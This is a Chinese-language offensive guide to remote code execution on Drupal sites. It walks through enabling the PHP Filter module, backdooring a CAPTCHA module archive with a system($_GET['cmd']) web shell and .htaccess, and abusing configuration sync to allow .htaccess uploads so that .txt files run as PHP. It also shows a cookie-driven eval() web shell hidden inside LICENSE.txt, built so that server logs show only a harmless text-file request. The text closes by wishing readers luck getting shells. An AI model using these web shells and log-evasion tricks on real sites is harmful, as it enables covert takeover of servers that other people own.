Drupal RCE

使用 PHP 过滤器模块

您需要 安装 php 插件（通过访问 /modules/php 检查，如果返回 403，则 存在，如果 未找到，则 php 插件未安装）

前往 Modules -> (检查) PHP Filter -> 保存配置

然后点击 添加内容 -> 选择 基本页面 或 文章 -> 在正文中写入 php shellcode -> 在 文本格式 中选择 PHP 代码 -> 选择 预览

最后只需访问新创建的节点：

curl http://drupal-site.local/node/3

安装 PHP Filter 模块

从版本 8 开始， PHP Filter 模块不再默认安装。要利用此功能，我们必须 自己安装该模块。

1. 从 Drupal 网站下载该模块的最新版本。

2. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

3. 下载完成后，转到 Administration > Reports > Available updates。

4. 点击 Browse，选择我们下载的目录中的文件，然后点击 Install。

5. 模块安装完成后，我们可以点击 Content 并 创建一个新的基本页面，类似于我们在 Drupal 7 示例中所做的。再次确保 从 Text format 下拉菜单中选择 PHP code。

后门模块

后门模块可以通过 向现有模块添加一个 shell 来创建。模块可以在 drupal.org 网站上找到。我们选择一个模块，例如 CAPTCHA。向下滚动并复制 tar.gz 归档 的链接。

• 下载归档并提取其内容。

wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz

• 创建一个 PHP web shell，内容为：

<?php
system($_GET["cmd"]);
?>

• 接下来，我们需要创建一个 .htaccess 文件，以便为自己提供对该文件夹的访问权限。这是必要的，因为 Drupal 拒绝直接访问 /modules 文件夹。

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

• 上述配置将在我们请求 /modules 中的文件时应用 / 文件夹的规则。将这两个文件复制到 captcha 文件夹并创建一个归档。

mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/

• 假设我们对网站有管理访问权限，点击侧边栏的**管理，然后点击扩展。接下来，点击+ 安装新模块按钮，我们将被带到安装页面，例如http://drupal-site.local/admin/modules/install。浏览到后门化的验证码归档并点击安装**。

• 安装成功后，浏览到**/modules/captcha/shell.php**以执行命令。

使用配置同步对Drupal进行后门化

分享者 Coiffeur0x90

第1部分（激活_媒体_和_媒体库_）

在_扩展_菜单（/admin/modules）中，您可以激活看似已经安装的插件。默认情况下，插件_媒体_和_媒体库_似乎未被激活，因此让我们激活它们。

激活前：

激活后：

第2部分（利用_配置同步_功能）

我们将利用_配置同步_功能来转储（导出）和上传（导入）Drupal配置条目：

• /admin/config/development/configuration/single/export

• /admin/config/development/configuration/single/import

补丁 system.file.yml

让我们从补丁第一个条目allow_insecure_uploads开始：

文件：system.file.yml

...

allow_insecure_uploads: false

...

到：

文件：system.file.yml

...

allow_insecure_uploads: true

...

修补 field.field.media.document.field_media_document.yml

然后，修补第二个条目 file_extensions 从：

文件： field.field.media.document.field_media_document.yml

...

file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'

...

到：

文件：field.field.media.document.field_media_document.yml

...

file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'htaccess txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'

...

我在这篇博客中没有使用它，但需要注意的是，可以以任意方式定义条目 file_directory，并且它容易受到路径遍历攻击（因此我们可以在Drupal文件系统树中向上返回）。

第3部分（利用功能 添加文档）

最后一步是最简单的，分为两个子步骤。第一个是上传一个.htaccess格式的文件，以利用Apache指令并允许PHP引擎解释.txt文件。第二个是上传一个包含我们有效载荷的.txt文件。

文件：.htaccess

<Files *>
SetHandler application/x-httpd-php
</Files>

# Vroum! Vroum!
# We reactivate PHP engines for all versions in order to be targetless.
<IfModule mod_php.c>
php_flag engine on
</IfModule>
<IfModule mod_php7.c>
php_flag engine on
</IfModule>
<IfModule mod_php5.c>
php_flag engine on
</IfModule>

为什么这个技巧很酷？

因为一旦 Webshell（我们称之为 LICENSE.txt）被放置到 Web 服务器上，我们可以通过 $_COOKIE 传输我们的命令，并且在 Web 服务器日志中，这将显示为对文本文件的合法 GET 请求。

为什么将我们的 Webshell 命名为 LICENSE.txt？

简单来说，如果我们以以下文件为例 core/LICENSE.txt（该文件已经存在于 Drupal 核心中），我们有一个 339 行和 17.6 KB 大小的文件，这非常适合在中间添加一小段 PHP 代码（因为文件足够大）。

文件：已修补的 LICENSE.txt

...

this License, you may choose any version ever published by the Free Software
Foundation.

<?php

# We inject our payload into the cookies so that in the logs of the compromised
# server it shows up as having been requested via the GET method, in order to
# avoid raising suspicions.
if (isset($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
if (!empty($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
eval($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"]);
} else {
phpinfo();
}
}

?>

10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author

...

第3.1部分（上传文件 .htaccess）

首先，我们利用 Add Document (/media/add/document) 功能上传包含 Apache 指令的文件 (.htaccess)。

第3.2部分（上传文件 LICENSE.txt）

然后，我们再次利用 Add Document (/media/add/document) 功能上传隐藏在许可证文件中的 Webshell。

第4部分（与 Webshell 交互）

最后一部分是与 Webshell 进行交互。

如以下截图所示，如果我们的 Webshell 期望的 cookie 未定义，则在通过 Web 浏览器查询文件时会得到后续结果。

当攻击者设置 cookie 时，他可以与 Webshell 交互并执行任何他想要的命令。

正如您在日志中看到的，似乎只请求了一个 txt 文件。

感谢您花时间阅读本文，希望它能帮助您获取一些 shells。